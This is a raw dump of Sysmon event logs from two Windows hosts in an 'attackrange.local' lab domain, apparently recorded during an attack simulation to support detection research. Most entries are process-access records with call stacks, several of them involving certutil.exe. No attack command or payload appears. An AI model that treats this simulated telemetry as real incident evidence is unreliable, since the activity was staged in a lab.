21:49:55.276{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638503Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.507{BFB545BB-B403-605B-2A5A-00000000AF01}3988872C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638502Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.366{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B403-605B-2A5A-00000000AF01}3988C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638501Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638500Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638499Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638498Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638497Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638496Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638495Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638494Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638493Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638492Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.366{BFB545BB-B864-6058-0500-00000000AF01}628744C:\Windows\system32\csrss.exe{BFB545BB-B403-605B-2A5A-00000000AF01}3988C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638491Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.366{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B403-605B-2A5A-00000000AF01}3988C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638490Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.367{BFB545BB-B403-605B-2A5A-00000000AF01}3988C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000638489Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.319{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65B342E6AA01DCA090E8EC5C9B7ACAD6,SHA256=FB745505998D9FFFE1C967AD443204BF30D95BB8E0B773434BB128684B8EFB54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638488Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:55.319{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7EEEC4B9B1A444C5C80B2D952EAD1D5,SHA256=7D882D022613322725E252CA469447A8468710F4EE226BF808EFA13A1DBCA81E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917683Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.261{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917682Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.260{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917681Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.242{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917680Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.242{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917679Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.242{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917678Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.241{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B403-605B-8269-00000000AE01}892C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917677Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.239{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B403-605B-8269-00000000AE01}892C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917676Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.234{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917675Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.234{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917674Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.234{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917673Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.233{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917672Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.233{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B403-605B-8269-00000000AE01}892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917671Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.233{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B403-605B-8269-00000000AE01}892C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917670Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.232{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B403-605B-8269-00000000AE01}892C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917669Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 